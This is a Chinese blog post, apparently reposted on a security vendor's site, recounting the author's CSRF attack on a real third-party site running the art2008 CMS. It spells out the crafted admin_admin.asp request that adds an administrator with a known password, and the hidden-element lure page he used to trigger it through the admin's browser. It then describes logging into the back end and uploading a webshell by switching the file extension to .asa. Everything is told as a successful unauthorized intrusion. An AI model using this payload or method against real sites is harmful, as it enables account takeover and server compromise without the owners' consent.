关于冰盾 | 使用条款 | 网站地图
 
一次基于CSRF下的攻击实例
一次基于CSRF下的攻击实例
作者:冰盾防火墙 网站:www.bingdun.com 日期:2014-12-06
 

最近想测试一下用CSRF来搞一个站有多快?  于是乎就测试了一下,结果还是挺让人满意的。废话不多说了, 切入正题。 文章没技术含量,望高手别捧腹大笑 - -||

我从源码站里下了一套源码,名曰:art2008  我是从增加管理员这里进行CSRF的, 同过抓包 我发现,构造一个链接如: 

http://www.xxx.com/admin/admin_admin.asp?
action=savenew&username=11111&PrUserName=11111&
passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA
&
fullname=%B9%FE%B9%FE&[email protected]&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code]

就能够自动增加一个管理员,  于是乎测试了一下,发现可以增加。然后便开始找对象进行试验..

google了一下 , 找了个管理员经常上的网站进行了测试, 然后我先是在自己空间上建立了以个test.htm 代码如下:

[code]你喜欢包拯吗? 
http://www.xxx(名字略).com/admin/admin_admin.asp?
action=savenew&username=111111&
PrUserName=111111&passwd=123456&
passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&[email protected]&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100">

然后找到那个网站的留言板,开始留言,如图:

 

当管理员访问我的网站时候,他便被CSRF了。。 就在此后, 我便去玩CS了,战绩还不错- - 杀16死5.

当我回来时候,管理员已经回复了(- - ||真快阿)如图: 

 

管理员应该访问了我的网站,于是我迅雷不及掩耳之势的跑去后台看看有没有成功增加,用户名:111111 密码:123456  结果成功登陆了!! 如图: 

 

后台后个上传,改了一下扩展名asa  ,马儿便飞到了服务器上,  如图: 

 

大概计算了一下,一共花费了约30分钟左右的时间。

 

 
最新内容:
浅谈CSRF漏洞挖掘技巧[2014-12-06]
DNS劫持攻击爆发 CSRF点中路由软肋[2014-12-06]
抵御DNS攻击 从构建现代DNS系统架构开始[2014-12-06]
浅谈与DNS相关的攻击[2014-12-06]
安全观察 Windows 域密码策略[2014-12-06]
如何配置Windows 2008高级防火墙[2014-12-06]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195